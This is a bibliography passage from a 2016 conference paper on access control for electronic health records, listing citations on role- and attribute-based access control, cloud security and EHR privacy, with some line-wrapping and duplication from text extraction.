ISO/TR, 2005. "Health Informatics-Electronic Health
Record, Definition, scope and context," s.l.: ISO/TR
20513Jose, L. F.-A., Inmaculada, C. S., Pedo, A. O.
L. & Ambrosio, T., 2013. Security and Privacy in
electronic health records: A systematic literature
review. Journal of Biomedical Informatics, Volume
46, pp. 541-562.
Jose, L. F.-A., Inmaculada, C. S., Pedo, A. O. L. &
Ambrosio, T., 2013."Security and Privacy in
electronic health records: A systematic literature
review," Journal of Biomedical Informatics, Volume
46, pp. 541-562.
Bill, B., Tricia, B. & Erin, K. B., 2011."Information
Systems Security & Assurance series. In: Access
Control,
Authentication,
and
Public
Key
Infrastructure,". Burlington: John & Barlett Learning,
pp. 208-211.
Nayer, J., Amit, S. & Praveen, A., 2015."Ethical
issues in electronic heath records: A general
overview," Perspectives in Clinical Research, 6(2),
pp. 73-76
Pierangela, S. & Sabrina De Capitani, d. V., 2000.
"Access
Control:
Policies,
Models,
and
Mechanisms," Brescia: Universita di Milano.
Younis, A. Y., Kashif, K. & Madjid, M., 2014."An
access control model for cloud computing,".Journal
of Information Security and Applications, Volume
19, pp. 45-60.
Ravi, S. S., Edward, J. ,. C., Hal, L. F. & Charles, E.
Y., 1996."Role Based Access Control Models," s.l.:
Seta Corporation.
Vincent, C. H. et al., 2014."Guide to Attribute Based
Access
Control
(ABAC)
Definition
and
Considerations," McLean: NIST Special Publication .
Mario, S., Angelo, E. & Mario, C., 2014."A patient
privacy centric access control model for EHR
systems," International Journal of Internet and
Secured Transactions, 5(2), pp. 163-187
L. Chen, Q. Zhou, G.-f. Haung and L.-q. Zhang, "A
trust Role based context aware access control model,"
2014.
K. Aymen and T. Said, "A semantic role-based access
control for intra and inter-organization collaboration,"
Toulouse, 2014..
Y.-q. Fan and Y.-s. Zhang, "Trusted Access Control
Model Based on Role and Task in Cloud Computing,"
Jinan, 2015.
S. Mario, E. Angelo and C. Mario, "An access control
model to minimize the data exchange in the
information retrieval," Journal of Ambient
Intelligence and Humanized Computing, 2015.
C. H. Vincent, D. Richard and F. F. David,"AttributeBased access Control," IEEE Computer Society,
2015.
K. S. Nitin and J. Anupam, "Representing Attribute
Based Access Control policies in OWL," Laguna
Hills,, 2016.
X. Zhongyuan and D. S. Scott, "Mining AttributeBased
Access
Control
Policies,"
IEEE
TRANSACTIONS ON DEPENDABLE AND
SECURE COMPUTING, vol. 12, no. 5, pp. 533-545,
2015.
K. Lawrence and A.-F. Jim, "Combining Mandatory
and Attribute-based Access Control," 2016.

120

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

[36]

[37]

[38]

[39]
[40]

[41]

[42]

[43]

R. Khaled, Y. Zhu, H. Hongxin and A. Gail-Joon,


"AR-ABAC: A new Attribute Based Access Control
Model supporting Attribute Rules for Cloud
Computing," in 2015 IEEE Conference on
Collaboration and Internet Computing, Clemson,
2015.
L. Zhiquan, C. Jialin, Z. Min and F. Dengguo,
"Efficiently Attribute-Based Access Control for
Mobile Cloud Storage System," in 13th International
Conference on Trust, Security and Privacy in
Computing and Communications, Beijing, 2014.
G. F. Kathleen and P.-F. Susan, "An Access Control
Framework for Semi-trusted storage using Attributebased Encryption with Short Ciphertext and Mediated
Revocation," Quezon, 2014.
B. Nihal and R. Sushmita, "Temporal Access Control
with user Revocation for Cloud Data," 2014.
F. Somchart and S. Hiroyuki, "An Extended CP-ABE
based Access Control Model for Data Outsources in
the cloud," in IEEE 39th Annual International
Computers, Software & Applications Conference,
2015.
W. Zhijie, H. Dijiang, Z. Yan, L. Bing and C.-J.
Chung, "Efficient Attribute-Based Comparable Data
Access Control," IEEE Transactions on computers,
vol. 64, no. 12, pp. 3430-3443, 2015.
H. Vincent, F. F. David, D. K. Richard, N. K. Raghu
and L. Yu, "Implementing and Managing Policy
Rules in Attribute Based Access Control,"
Gaithersburg, 2015.
Y. Chen, J. Lu and J. Jan."A secure EHR system
based on hybrid clouds," J. Med. Syst. 36(5), pp.
3375-84. 2012.

ISBN: 978-1-941968-37-6 2016 SDIWC

121

You might also like